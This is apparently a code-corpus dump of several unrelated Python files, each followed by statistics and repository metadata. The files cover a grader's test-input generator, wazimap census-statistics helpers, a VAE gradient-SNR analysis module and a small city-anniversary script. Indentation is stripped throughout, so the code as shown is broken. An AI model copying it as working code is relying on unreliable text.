main_function = problem_data["metadata"]["main_function"]
init_data = problem_data["init_data"]
is_init_data = problem_data["metadata"]["init_data"]
is_inputs = problem_data["metadata"]["inputs"]
with open(path, 'w') as f:
write_prequel(f)
for line in program_text:
split_line = line.split()
if len(split_line) > 0 and line.split()[0] == "def":
func_name = line.split()[1].split("(")[0]
if func_name == main_function:
fname = func_name
f.write("{0}\n".format(line))
if not line.endswith("\n"):
f.write("\n")
write_sequel(f, fname)
def gen_sample_outputs(filename, problem_data, init_data=None, input_type="default"):
"""Utility function invoked whenever a reference problem is submitted
Returns a list of outputs that are subsequently stored in DB as field associated with given problem"""
inputs = problem_data["inputs"]
platform = sys.platform.lower()
SAMPUP_TIMEOUT = "8"
SAMPUP_MEMOUT = "1000"
timeout_cmd = "gtimeout {0}".format(SAMPUP_TIMEOUT) if platform == "darwin" else "timeout {0} -m {1}".format(SAMPUP_TIMEOUT, SAMPUP_MEMOUT) if platform == "linux" or platform == "linux2" else ""
base_cmd = "{0} python".format(timeout_cmd)
outputs = []
if input_type == "default":
programmatic_inputs = inputs
if inputs is not None:
for inp in programmatic_inputs:
input_arg = json.dumps(inp)
output = process_output(base_cmd, filename, input_arg=input_arg, init_data=init_data)
### uncomment below line for debugging
# print("CSO =>", cleaned_split_output)
outputs.append(output)
else:
output = process_output(base_cmd, filename, init_data=init_data)
### uncomment below line for debugging
# print("CSO =>", cleaned_split_output)
outputs.append(output)
elif input_type == "file":
for script in inputs:
output = process_output(base_cmd, filename, input_arg=script, init_data=init_data)
### uncomment below line for debugging
# print("CSO =>", cleaned_split_output)
outputs.append(output)
try:
os.remove(script)
except:
pass
return outputs
def get_code_from_file(path):
with open(path, 'r') as f:
return f.read().splitlines()
def generate_input(input_type, input_length, num_tests):
"""Self-explanatory utility function that generates test input for a submitted reference problem based on metadata specifications
Returns jsonified list of inputs"""
def random_string(length):
rand_string = ''.join(random.choice(string.ascii_letters) for i in range(length))
return rand_string
global_inputs = []
for i in range(num_tests):
if input_type == "integer":
inp_list = [random.randint(1, 1000) for x in range(input_length)]
elif input_type == "float":
inp_list = [round(random.uniform(0.0, 1000.0), 2) for x in range(input_length)]
elif input_type == "string":
inp_list = [random_string(random.randint(1, 10)) for x in range(input_length)]
global_inputs.append(inp_list)
return global_inputs
def handle_uploaded_file_inputs(processed_data):
input_dict = {"files": {}}
count = 0
### add below for loop for multiple files
# for count, file_obj in enumerate(processed_data.get("target_file")):
input_dict["files"]["file_{0}".format(count+1)] = ""
file_obj = processed_data.get("target_file")
with open("file_{0}.py".format(count+1), 'w') as g:
for chunk in file_obj.chunks():
decoded_chunk = chunk.decode("utf-8")
input_dict["files"]["file_{0}".format(count+1)] += decoded_chunk
g.write(decoded_chunk)
return input_dict
def json_reorder(hashmap):
new_hm = {}
for k in sorted(hashmap, key=lambda item: (len(item), item), reverse=False):
new_hm[k] = hashmap[k]
return new_hm
| 40.2
| 198
| 0.632699
| 754
| 5,829
| 4.667109
| 0.274536
| 0.031827
| 0.018755
| 0.024155
| 0.247798
| 0.22819
| 0.212276
| 0.186132
| 0.123615
| 0.103723
| 0
| 0.009729
| 0.259393
| 5,829
| 145
| 199
| 40.2
| 0.80542
| 0.164522
| 0
| 0.09009
| 0
| 0
| 0.09338
| 0.023034
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081081
| false
| 0.009009
| 0.09009
| 0
| 0.225225
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
904821f621f97dceeec43eb063d81e21fa90c37c
| 21,136
|
py
|
Python
|
wazimap/data/utils.py
|
AssembleOnline/wazimap
|
1b8b68fb231b768047eee1b20ed180e4820a2890
|
[
"MIT"
] | 1
|
2019-01-14T15:37:03.000Z
|
2019-01-14T15:37:03.000Z
|
wazimap/data/utils.py
|
Bhanditz/wazimap
|
fde22a0874020cf0ae013aeec7ab55b7c5a70b27
|
[
"MIT"
] | null | null | null |
wazimap/data/utils.py
|
Bhanditz/wazimap
|
fde22a0874020cf0ae013aeec7ab55b7c5a70b27
|
[
"MIT"
] | null | null | null |
from __future__ import division
from collections import OrderedDict
from sqlalchemy import create_engine, MetaData, func
from sqlalchemy.orm import sessionmaker, class_mapper
from django.conf import settings
from django.db.backends.base.creation import TEST_DATABASE_PREFIX
from django.db import connection
if settings.TESTING:
# Hack to ensure the sqlalchemy database name matches the Django one
# during testing
url = settings.DATABASE_URL
parts = url.split("/")
# use the test database name
db_name = connection.settings_dict.get('TEST', {}).get('NAME')
if db_name is None:
db_name = TEST_DATABASE_PREFIX + parts[-1]
parts[-1] = db_name
url = '/'.join(parts)
_engine = create_engine(url)
else:
_engine = create_engine(settings.DATABASE_URL)
# See http://docs.sqlalchemy.org/en/latest/core/constraints.html#constraint-naming-conventions
naming_convention = {
"ix": 'ix_%(column_0_label)s',
"uq": "uq_%(table_name)s_%(column_0_name)s",
"ck": "ck_%(table_name)s_%(constraint_name)s",
"fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s",
"pk": "pk_%(table_name)s"
}
_metadata = MetaData(bind=_engine, naming_convention=naming_convention)
_Session = sessionmaker(bind=_engine)
def get_session():
return _Session()
class LocationNotFound(Exception):
pass
class Location(object):
'''
Simple object to represent a location in the South African
context.
'''
def __init__(self, address, province_code, ward_code, ward_no,
municipality, coordinates):
self.address = address
self.province_code = province_code
# Northern Province is now called Limpopo
if self.province_code == 'NP':
self.province_code = 'LIM'
self.ward_code = ward_code
self.ward_no = ward_no
self.municipality = municipality
self.latitude = coordinates[0]
self.longitude = coordinates[1]
def __repr__(self):
return 'Location(address="%s", ward_code="%s", ' \
'municipality="%s", province_code="%s", ' \
'latitude=%s, longitude=%s, ward_no=%s)' \
% (self.address, self.ward_code, self.municipality,
self.province_code, self.latitude, self.longitude,
self.ward_no)
def capitalize(s):
"""
Capitalize the first char of a string, without
affecting the rest of the string.
This differs from `str.capitalize` since the latter
also lowercases the rest of the string.
"""
if not s:
return s
return ''.join([s[0].upper(), s[1:]])
def percent(num, denom, places=2):
if denom == 0:
return 0
else:
return round(num / denom * 100, places)
def ratio(num, denom, places=2):
if denom == 0:
return 0
else:
return round(num / denom, places)
def add_metadata(data, table):
if 'metadata' not in data:
data['metadata'] = {}
# this might be a SQLAlchemy model that is linked back to
# a data table
if hasattr(table, 'data_tables'):
table = table.data_tables[0]
data['metadata']['table_id'] = table.id
if table.universe:
data['metadata']['universe'] = table.universe
if table.year:
data['metadata']['year'] = table.year
# dictionaries that merge_dicts will merge
MERGE_KEYS = set(['values', 'numerators', 'error'])
def collapse_categories(data, categories, key_order=None):
if key_order:
collapsed = OrderedDict((key, {'name': key}) for key in key_order)
else:
collapsed = {}
metadata = None
if 'metadata' in data:
metadata = data['metadata']
del data['metadata']
# level 1: iterate over categories in data
for fields in data.values():
new_category_name = categories[fields['name']]
# ignore items with a None category
if new_category_name is None:
continue
collapsed.setdefault(new_category_name, {'name': new_category_name})
new_fields = collapsed[new_category_name]
# level 2: iterate over measurement objects in category
for measurement_key, measurement_objects in fields.iteritems():
if measurement_key == 'name':
continue
new_fields.setdefault(measurement_key, {})
new_measurement_objects = new_fields[measurement_key]
# level 3: iterate over data points in measurement objects
for datapoint_key, datapoint_value in measurement_objects.iteritems():
try:
new_measurement_objects.setdefault(datapoint_key, 0)
new_measurement_objects[datapoint_key] += float(datapoint_value)
except (ValueError, TypeError):
new_measurement_objects[datapoint_key] = datapoint_value
if metadata is not None:
collapsed['metadata'] = metadata
return collapsed
def calculate_median(objects, field_name):
'''
Calculates the median where obj.total is the distribution count and
getattr(obj, field_name) is the distribution segment.
Note: this function assumes the objects are sorted.
'''
total = 0
for obj in objects:
total += obj.total
half = total / 2.0
counter = 0
for i, obj in enumerate(objects):
counter += obj.total
if counter > half:
if counter - half == 1:
# total must be even (otherwise counter - half ends with .5)
return (float(getattr(objects[i - 1], field_name)) +
float(getattr(obj, field_name))) / 2.0
return float(getattr(obj, field_name))
elif counter == half:
# total must be even (otherwise half ends with .5)
return (float(getattr(obj, field_name)) +
float(getattr(objects[i + 1], field_name))) / 2.0
def calculate_median_stat(stats):
'''
Calculates the stat (key) that lies at the median for stat data from the
output of get_stat_data.
Note: this function assumes the objects are sorted.
'''
total = 0
keys = [k for k in stats.iterkeys() if k != 'metadata']
total = sum(stats[k]['numerators']['this'] for k in keys)
half = total / 2.0
counter = 0
for key in keys:
counter += stats[key]['numerators']['this']
if counter >= half:
return key
def merge_dicts(this, other, other_key):
'''
Recursively merges 'other' dict into 'this' dict. In particular
it merges the leaf nodes specified in MERGE_KEYS.
'''
for key, values in this.iteritems():
if key in MERGE_KEYS:
if key in other:
values[other_key] = other[key]['this']
elif isinstance(values, dict):
merge_dicts(values, other[key], other_key)
def group_remainder(data, num_items=4, make_percentage=True,
remainder_name="Other"):
'''
This function assumes data is an OrderedDict instance. It iterates
over the dict items, grouping items with index >= num_items - 1 together
under key remainder_name. If make_percentage = True, the 'values' dict
contains percentages and the 'numerators' dict the totals. Otherwise
'values' contains the totals.
'''
num_key = 'numerators' if make_percentage else 'values'
total_all = dict((k, 0.0) for k in data.values()[0][num_key].keys())
total_other = total_all.copy()
other_dict = {
"name": remainder_name,
"error": {"this": 0.0},
"numerator_errors": {"this": 0.0},
num_key: total_other,
}
cutoff = num_items - 2
for i, (key, values) in enumerate(data.items()):
if key == 'metadata':
continue
for k, v in values[num_key].iteritems():
total_all[k] += v
if i > cutoff:
del data[key]
data.setdefault(remainder_name, other_dict)
for k, v in values[num_key].iteritems():
total_other[k] += v
if make_percentage:
for key, values in data.iteritems():
if key != 'metadata':
values['values'] = dict((k, percent(v, total_all[k]))
for k, v in values['numerators'].iteritems())
def get_objects_by_geo(db_model, geo, session, fields=None, order_by=None,
only=None, exclude=None, data_table=None):
""" Get rows of statistics from the stats mode +db_model+ for a particular
geography, summing over the 'total' field and grouping by +fields+. Filters
to include +only+ and ignore +exclude+, if given.
"""
data_table = data_table or db_model.data_tables[0]
if fields is None:
fields = [c.key for c in class_mapper(db_model).attrs if c.key not in ['geo_code', 'geo_level', 'geo_version', 'total']]
fields = [getattr(db_model, f) for f in fields]
objects = session\
.query(func.sum(db_model.total).label('total'), *fields)\
.group_by(*fields)\
.filter(db_model.geo_code == geo.geo_code)\
.filter(db_model.geo_level == geo.geo_level)\
.filter(db_model.geo_version == geo.version)
if only:
for k, v in only.iteritems():
objects = objects.filter(getattr(db_model, k).in_(v))
if exclude:
for k, v in exclude.iteritems():
objects = objects.filter(getattr(db_model, k).notin_(v))
if order_by is not None:
attr = order_by
is_desc = False
if order_by[0] == '-':
is_desc = True
attr = attr[1:]
if attr == 'total':
if is_desc:
attr = attr + ' DESC'
else:
attr = getattr(db_model, attr)
if is_desc:
attr = attr.desc()
objects = objects.order_by(attr)
objects = objects.all()
if len(objects) == 0:
raise LocationNotFound("%s for geography %s version '%s' not found"
% (db_model.__table__.name, geo.geoid, geo.version))
return objects
def get_stat_data(fields, geo, session, order_by=None,
percent=True, total=None, table_fields=None,
table_name=None, only=None, exclude=None, exclude_zero=False,
recode=None, key_order=None, table_dataset=None,
percent_grouping=None, slices=None):
"""
This is our primary helper routine for building a dictionary suitable for
a place's profile page, based on a statistic.
It sums over the data for ``fields`` in the database for the place identified by
``geo`` and calculates numerators and values. If multiple fields are given,
it creates nested result dictionaries.
Control the rows that are included or ignored using ``only``, ``exclude`` and ``exclude_zero``.
The field values can be recoded using ``recode`` and and re-ordered using ``key_order``.
:param fields: the census field to build stats for. Specify a list of fields to build
nested statistics. If multiple fields are specified, then the values
of parameters such as ``only``, ``exclude`` and ``recode`` will change.
These must be fields in `api.models.census.census_fields`, e.g. 'highest educational level'
:type fields: str or list
:param geo: the geograhy object
:param dbsession session: sqlalchemy session
:param str order_by: field to order by, or None for default, eg. '-total'
:param bool percent: should we calculate percentages, or just sum raw values?
:param list percent_grouping: when calculating percentages, which fields should rows be grouped by?
Default: none of them -- calculate each entry as a percentage of the
whole dataset. Ignored unless ``percent`` is ``True``.
:param list table_fields: list of fields to use to find the table, defaults to `fields`
:param int total: the total value to use for percentages, or None to total columns automatically
:param str table_name: override the table name, otherwise it's calculated from the fields and geo_level
:param list only: only include these field values. If ``fields`` has many items, this must be a dict
mapping field names to a list of strings.
:type only: dict or list
:param exclude: ignore these field values. If ``fields`` has many items, this must be a dict
mapping field names to a list of strings. Field names are checked
before any recoding.
:type exclude: dict or list
:param bool exclude_zero: ignore fields that have a zero or null total
:param recode: function or dict to recode values of ``key_field``. If ``fields`` is a singleton,
then the keys of this dict must be the values to recode from, otherwise
they must be the field names and then the values. If this is a lambda,
it is called with the field name and its value as arguments.
:type recode: dict or lambda
:param key_order: ordering for keys in result dictionary. If ``fields`` has many items,
this must be a dict from field names to orderings.
The default ordering is determined by ``order``.
:type key_order: dict or list
:param str table_dataset: dataset used to help find the table if ``table_name`` isn't given.
:param list slices: return only a slice of the final data, by choosing a single value for each
field in the field list, as specified in the slice list.
:return: (data-dictionary, total)
"""
from .tables import FieldTable
if not isinstance(fields, list):
fields = [fields]
n_fields = len(fields)
many_fields = n_fields > 1
if order_by is None:
order_by = fields[0]
if only is not None:
if not isinstance(only, dict):
if many_fields:
raise ValueError("If many fields are given, then only must be a dict. I got %s instead" % only)
else:
only = {fields[0]: set(only)}
if exclude is not None:
if not isinstance(exclude, dict):
if many_fields:
raise ValueError("If many fields are given, then exclude must be a dict. I got %s instead" % exclude)
else:
exclude = {fields[0]: set(exclude)}
if key_order:
if not isinstance(key_order, dict):
if many_fields:
raise ValueError("If many fields are given, then key_order must be a dict. I got %s instead" % key_order)
else:
key_order = {fields[0]: key_order}
else:
key_order = {}
if recode:
if not isinstance(recode, dict) or not many_fields:
recode = dict((f, recode) for f in fields)
table_fields = table_fields or fields
# get the table and the model
if table_name:
data_table = FieldTable.get(table_name)
else:
data_table = FieldTable.for_fields(table_fields, table_dataset)
if not data_table:
ValueError("Couldn't find a table that covers these fields: %s" % table_fields)
objects = get_objects_by_geo(data_table.model, geo, session, fields=fields, order_by=order_by,
only=only, exclude=exclude, data_table=data_table)
if total is not None and many_fields:
raise ValueError("Cannot specify a total if many fields are given")
if total and percent_grouping:
raise ValueError("Cannot specify a total if percent_grouping is given")
if total is None and percent and data_table.total_column is None:
# The table doesn't support calculating percentages, but the caller
# has asked for a percentage without providing a total value to use.
# Either specify a total, or specify percent=False
raise ValueError("Asking for a percent on table %s that doesn't support totals and no total parameter specified." % data_table.id)
# sanity check the percent grouping
if percent:
if percent_grouping:
for field in percent_grouping:
if field not in fields:
raise ValueError("Field '%s' specified in percent_grouping must be in the fields list." % field)
# re-order percent grouping to be same order as in the field list
percent_grouping = [f for f in fields if f in percent_grouping]
else:
percent_grouping = None
denominator_key = getattr(data_table, 'denominator_key')
root_data = OrderedDict()
running_total = 0
group_totals = {}
grand_total = -1
def get_recoded_key(recode, field, key):
recoder = recode[field]
if isinstance(recoder, dict):
return recoder.get(key, key)
else:
return recoder(field, key)
def get_data_object(obj):
""" Recurse down the list of fields and return the
final resting place for data for this stat. """
data = root_data
for i, field in enumerate(fields):
key = getattr(obj, field)
if recode and field in recode:
key = get_recoded_key(recode, field, key)
else:
key = capitalize(key)
# enforce key ordering the first time we see this field
if (not data or data.keys() == ['metadata']) and field in key_order:
for fld in key_order[field]:
data[fld] = OrderedDict()
# ensure it's there
if key not in data:
data[key] = OrderedDict()
data = data[key]
# default values for intermediate fields
if data is not None and i < n_fields - 1:
data['metadata'] = {'name': key}
# data is now the dict where the end value is going to go
if not data:
data['name'] = key
data['numerators'] = {'this': 0.0}
return data
# run the stats for the objects
for obj in objects:
if not obj.total and exclude_zero:
continue
if denominator_key and getattr(obj, data_table.fields[-1]) == denominator_key:
grand_total = obj.total
# don't include the denominator key in the output
continue
# get the data dict where these values must go
data = get_data_object(obj)
if not data:
continue
if obj.total is not None:
data['numerators']['this'] += obj.total
running_total += obj.total
else:
# TODO: sanity check this is the right thing to do for multiple fields with
# nested nulls -- does aggregating over nulls treat them as zero, or should we
# treat them as null?
data['numerators']['this'] = None
if percent_grouping:
if obj.total is not None:
group_key = tuple()
for field in percent_grouping:
key = getattr(obj, field)
if recode and field in recode:
# Group by recoded keys
key = get_recoded_key(recode, field, key)
group_key = group_key + (key,)
data['_group_key'] = group_key
group_totals[group_key] = group_totals.get(group_key, 0) + obj.total
if grand_total == -1:
grand_total = running_total if total is None else total
# add in percentages
def calc_percent(data):
for key, data in data.iteritems():
if not key == 'metadata':
if 'numerators' in data:
if percent:
if '_group_key' in data:
total = group_totals[data.pop('_group_key')]
else:
total = grand_total
if total is not None and data['numerators']['this'] is not None:
perc = 0 if total == 0 else (data['numerators']['this'] / total * 100)
data['values'] = {'this': round(perc, 2)}
else:
data['values'] = {'this': None}
else:
data['values'] = dict(data['numerators'])
data['numerators']['this'] = None
else:
calc_percent(data)
calc_percent(root_data)
if slices:
for v in slices:
root_data = root_data[v]
add_metadata(root_data, data_table)
return root_data, grand_total
def create_debug_dump(data, geo_level, name):
import os
import json
debug_dir = os.path.join(os.path.dirname(__file__), 'debug')
if not os.path.exists(debug_dir):
os.mkdir(debug_dir)
with open(os.path.join(debug_dir, '%s_%s.json' % (name, geo_level)), 'w') as f:
f.write(json.dumps(data, indent=4))
| 36.758261
| 138
| 0.607116
| 2,761
| 21,136
| 4.519377
| 0.159725
| 0.01154
| 0.007213
| 0.005289
| 0.148341
| 0.115403
| 0.09673
| 0.070284
| 0.057702
| 0.052412
| 0
| 0.005025
| 0.303321
| 21,136
| 574
| 139
| 36.8223
| 0.842377
| 0.277016
| 0
| 0.180516
| 0
| 0
| 0.094829
| 0.011686
| 0
| 0
| 0
| 0.001742
| 0
| 1
| 0.051576
| false
| 0.002865
| 0.028653
| 0.005731
| 0.137536
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9048acfcee11de068839ac11bcc199658e3bb1fe
| 9,913
|
py
|
Python
|
ovis/analysis/gradients.py
|
vlievin/ovis
|
71f05a5f5219b2df66a9cdbd5a5339e0e179597b
|
[
"MIT"
] | 10
|
2020-08-06T22:25:11.000Z
|
2022-03-07T13:10:15.000Z
|
ovis/analysis/gradients.py
|
vlievin/ovis
|
71f05a5f5219b2df66a9cdbd5a5339e0e179597b
|
[
"MIT"
] | 2
|
2021-06-08T22:15:24.000Z
|
2022-03-12T00:45:59.000Z
|
ovis/analysis/gradients.py
|
vlievin/ovis
|
71f05a5f5219b2df66a9cdbd5a5339e0e179597b
|
[
"MIT"
] | null | null | null |
from time import time
from typing import *
import torch
from booster import Diagnostic
from torch import Tensor
from tqdm import tqdm
from .utils import cosine, percentile, RunningMean, RunningVariance
from ..estimators import GradientEstimator
from ..models import TemplateModel
def get_grads_from_tensor(model: TemplateModel, loss: Tensor, output: Dict[str, Tensor], tensor_id: str, mc: int, iw: int):
"""
Compute the gradients given a `tensor` on which was called `tensor.retain_graph()`
Assumes `tensor` to have `tensor.shape[0] == bs * iw * mc`
:param model: VAE model
:param loss: loss value
:param output: model's output: dict
:param tensor_id: key of the tensor in the model output
:param mc: number of outer Monte-Carlo samples
:param iw: number of inner Importance-Weighted samples
:return: gradient: Tensor of shape [D,] where D is the number of elements in `tensor`
"""
assert tensor_id in output.keys(), f"Tensor_id = `{tensor_id}` not in model's output"
model.zero_grad()
loss.sum().backward(create_graph=True, retain_graph=True)
# get the tensor of interest
tensors = output[tensor_id] if isinstance(output[tensor_id], list) else output[tensor_id]
bs = tensors[0].shape[0] // (mc * iw)
# get the gradients, flatten and concat across the feature dimension
gradients = [p.grad for p in tensors]
assert not any(
[g is None for g in gradients]), f"{sum([int(g is None) for g in gradients])} tensors have no gradients. " \
f"Use `tensor.retain_graph()` in your model to enable gradients. " \
f"tensor_id = `{tensor_id}`"
# compute gradients estimate for each individual grads
# sum individual gradients because x_expanded = x.expand(bs, mc, iw)
gradients = torch.cat([g.view(bs, mc * iw, -1).sum(1) for g in gradients], 1)
# return an MC average of the grads
return gradients.mean(0)
def get_grads_from_parameters(model: TemplateModel, loss: Tensor, key_filter: str = ''):
"""
Return the gradients for the parameters matching the `key_filter`
:param model: VAE model
:param loss: loss value
:param key_filter: filter value (comma separated values accepted (e.g. "A,b"))
:return: Tensor of shape [D,] where `D` is the number of parameters
"""
key_filters = key_filter.split(',')
params = [p for k, p in model.named_parameters() if any([(_key in k) for _key in key_filters])]
assert len(params) > 0, f"No parameters matching filter = `{key_filters}`"
model.zero_grad()
# backward individual gradients \nabla L[i]
loss.mean().backward(create_graph=True, retain_graph=True)
# gather gradients for each parameter and concat such that each element across the dim 1 is a parameter
grads = [p.grad.view(-1) for p in params if p.grad is not None]
return torch.cat(grads, 0)
def get_gradients_statistics(estimator: GradientEstimator,
model: TemplateModel,
x: Tensor,
mc_samples: int = 100,
key_filter: str = 'inference_network',
oracle_grad: Optional[Tensor] = None,
return_grads: bool = False,
compute_dsnr: bool = True,
samples_per_batch: Optional[int] = None,
eps: float = 1e-15,
tqdm: Callable = tqdm,
**config: Dict) -> Tuple[Diagnostic, Dict]:
"""
Compute the gradients and return the statistics (Variance, Magnitude, SNR, DSNR)
If an `oracle` gradient is available: compute the cosine similarity with the oracle and the gradient estimate (direction)
The Magnitude, Variance and SNR are defined parameter-wise. All return values are average over the D parameters with
Variance > eps. For instance, the returned SNR is
* SNR = 1/D \sum_d SNR_d
Each MC sample is computed sequentially and the mini-batch `x` will be split into chuncks
if a value `samples_per_batch` if specified and if `samples_per_batch < x.size(0) * mc * iw`.
:param estimator: Gradient Estimator
:param model: VAE model
:param x: mini-batch of observations
:param mc_samples: number of Monte-Carlo samples
:param key_filter: key matching parameters names in the model
:param oracle_grad: true direction of the gradients [Optional]
:param return_grads: return all gradients in the `meta` output directory if set to `True`
:param compute_dsnr: compute the Directional SNR if set to `True`
:param samples_per_batch: max. number of individual samples `bs * mc * iw` per mini-batch [Optional]
:param eps: minimum Variance value used for filtering
:param config: config dictionary for the estimator
:param tqdm: custom `tqdm` function
:return: output : Diagnostic = {'grads' : {'variance': ..,
'magnitude': ..,
'snr': ..,
'dsnr' ..,
'direction': cosine similarity with the oracle,
'keep_ratio' : ratio of parameter-wise gradients > epsilon}}
'snr': {'percentiles', 'mean', 'min', 'max'}
},
meta : additional data including the gradients values if `return_grads`
"""
_start = time()
grads_dsnr = None
grads_mean = RunningMean()
grads_variance = RunningVariance()
if oracle_grad is not None:
grads_dir = RunningMean()
all_grads = None
# compute each MC sample sequentially
for i in tqdm(range(mc_samples), desc="Gradients Analysis"):
# compute number of chuncks based on the capacity `samples_per_batch`
if samples_per_batch is None:
chuncks = 1
else:
bs = x.size(0)
mc = estimator.config['mc']
iw = estimator.config['iw']
# infer number of chunks
total_samples = bs * mc * iw
chuncks = max(1, -(-total_samples // samples_per_batch)) # ceiling division
# compute mini-batch gradient by chunck if `x` is large
gradients = RunningMean()
for k, x_ in enumerate(x.chunk(chuncks, dim=0)):
model.eval()
model.zero_grad()
# forward, backward to compute the gradients
loss, diagnostics, output = estimator(model, x_, backward=False, **config)
# gather mini-batch gradients
if 'tensor:' in key_filter:
tensor_id = key_filter.replace("tensor:", "")
gradients_ = get_grads_from_tensor(model, loss, output, tensor_id, estimator.mc, estimator.iw)
else:
gradients_ = get_grads_from_parameters(model, loss, key_filter=key_filter)
# move to cpu
gradients_ = gradients_.detach().cpu()
# update average
gradients.update(gradients_, k=x_.size(0))
# gather statistics
with torch.no_grad():
gradients = gradients()
if return_grads or compute_dsnr:
all_grads = gradients[None] if all_grads is None else torch.cat([all_grads, gradients[None]], 0)
grads_mean.update(gradients)
grads_variance.update(gradients)
# compute the statistics
with torch.no_grad():
# compute statistics for each data point `x_i`
grads_variance = grads_variance()
grads_mean = grads_mean()
# compute signal-to-noise ratio. see `tighter variational bounds are not necessarily better` (eq. 4)
grad_var_sqrt = grads_variance.pow(0.5)
clipped_variance_sqrt = grad_var_sqrt.clamp(min=eps)
grads_snr = grads_mean.abs() / (clipped_variance_sqrt)
# compute DSNR, see `tighter variational bounds are not necessarily better` (eq. 12)
if compute_dsnr:
u = all_grads.mean(0, keepdim=True)
u /= u.norm(dim=1, keepdim=True, p=2)
g_parallel = u * (u * all_grads).sum(1, keepdim=True)
g_perpendicular = all_grads - g_parallel
grads_dsnr = g_parallel.norm(dim=1, p=2) / (eps + g_perpendicular.norm(dim=1, p=2))
# compute grad direction: cosine similarity between the gradient estimate and the oracle
if oracle_grad is not None:
grads_dir = cosine(grads_mean, oracle_grad, dim=-1)
# reinitialize grads
model.zero_grad()
# reduce fn: keep only parameter with variance > 0
mask = (grads_variance > eps).float()
_reduce = lambda x: (x * mask).sum() / mask.sum()
output = Diagnostic({'grads': {
'variance': _reduce(grads_variance),
'magnitude': _reduce(grads_mean.abs()),
'snr': _reduce(grads_snr),
'dsnr': grads_dsnr.mean() if grads_dsnr is not None else 0.,
'keep_ratio': mask.sum() / torch.ones_like(mask).sum()
},
'snr': {
'p25': percentile(grads_snr, q=0.25), 'p50': percentile(grads_snr, q=0.50),
'p75': percentile(grads_snr, q=0.75), 'p5': percentile(grads_snr, q=0.05),
'p95': percentile(grads_snr, q=0.95), 'min': grads_snr.min(),
'max': grads_snr.max(), 'mean': grads_snr.mean()}
})
if oracle_grad is not None:
output['grads']['direction'] = grads_dir.mean()
# additional data: raw grads, and mean,var,snr for each parameter separately
meta = {
'grads': all_grads,
'expected': grads_mean,
'magnitude': grads_mean.abs(),
'var': grads_variance,
'snr': grads_snr,
}
return output, meta
| 42.545064
| 125
| 0.611924
| 1,260
| 9,913
| 4.684127
| 0.21746
| 0.016266
| 0.017791
| 0.016096
| 0.147069
| 0.076415
| 0.072857
| 0.052525
| 0.042697
| 0.011183
| 0
| 0.009255
| 0.291536
| 9,913
| 232
| 126
| 42.728448
| 0.831126
| 0.382528
| 0
| 0.094828
| 0
| 0
| 0.070229
| 0.003902
| 0
| 0
| 0
| 0
| 0.025862
| 1
| 0.025862
| false
| 0
| 0.077586
| 0
| 0.12931
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
904a907ab750687eb1de030da0541431f23b5d88
| 1,081
|
py
|
Python
|
Sem-09-T1-Q5.py
|
daianasousa/Semana-09
|
decfc9b47931ae4f5a4f30a0d26b931ecd548f59
|
[
"MIT"
] | null | null | null |
Sem-09-T1-Q5.py
|
daianasousa/Semana-09
|
decfc9b47931ae4f5a4f30a0d26b931ecd548f59
|
[
"MIT"
] | null | null | null |
Sem-09-T1-Q5.py
|
daianasousa/Semana-09
|
decfc9b47931ae4f5a4f30a0d26b931ecd548f59
|
[
"MIT"
] | null | null | null |
def carrega_cidades():
resultado = []
with open('cidades.csv', 'r', encoding='utf-8') as arquivo:
for linha in arquivo:
uf, ibge, nome, dia, mes, pop = linha.split(';')
resultado.append(
(uf, int(ibge), nome, int(dia), int(mes), int(pop))
)
arquivo.close()
return resultado
def main():
mes = int(input('Mês: '))
populacao = int(input('População: '))
cidades = carrega_cidades()
meses = ('JANEIRO', 'FEVEREIRO' ,'MARÇO' ,'ABRIL' ,'MAIO' ,'JUNHO' ,'JULHO' ,'AGOSTO' ,'SETEMBRO' , 'OUTUBRO', 'NOVEMBRO', 'DEZEMBRO')
for i in range(12):
meses[i]
print(f'CIDADES COM MAIS DE {populacao} HABITANTES E ANIVERSÁRIO EM {meses[mes-1]}:')
for dados in cidades:
if dados[-1] > populacao and dados[-2] == mes:
nome = dados[2]
dia = dados[3]
uf = dados[0]
pop = dados[-1]
print(f'{nome}({uf}) tem {pop} habitantes e faz aniversário em {dia} de {meses[mes-1].lower()}.')
if __name__ == '__main__':
main()
| 30.885714
| 138
| 0.543941
| 134
| 1,081
| 4.313433
| 0.507463
| 0.048443
| 0.031142
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01423
| 0.284921
| 1,081
| 35
| 139
| 30.885714
| 0.733506
| 0
| 0
| 0
| 0
| 0.037037
| 0.259704
| 0.021257
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0
| 0
| 0.111111
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f3a8ec38dd614e2783df50d617c5b8f3ca8b0f8
| 1,428
|
py
|
Python
|
data_split.py
|
CodeDogandCat/ChineseGrammarErrorDiagnose
|
4e1ec745ae938f742c6afb0e88b08ea50c6028cb
|
[
"Apache-2.0"
] | null | null | null |
data_split.py
|
CodeDogandCat/ChineseGrammarErrorDiagnose
|
4e1ec745ae938f742c6afb0e88b08ea50c6028cb
|
[
"Apache-2.0"
] | null | null | null |
data_split.py
|
CodeDogandCat/ChineseGrammarErrorDiagnose
|
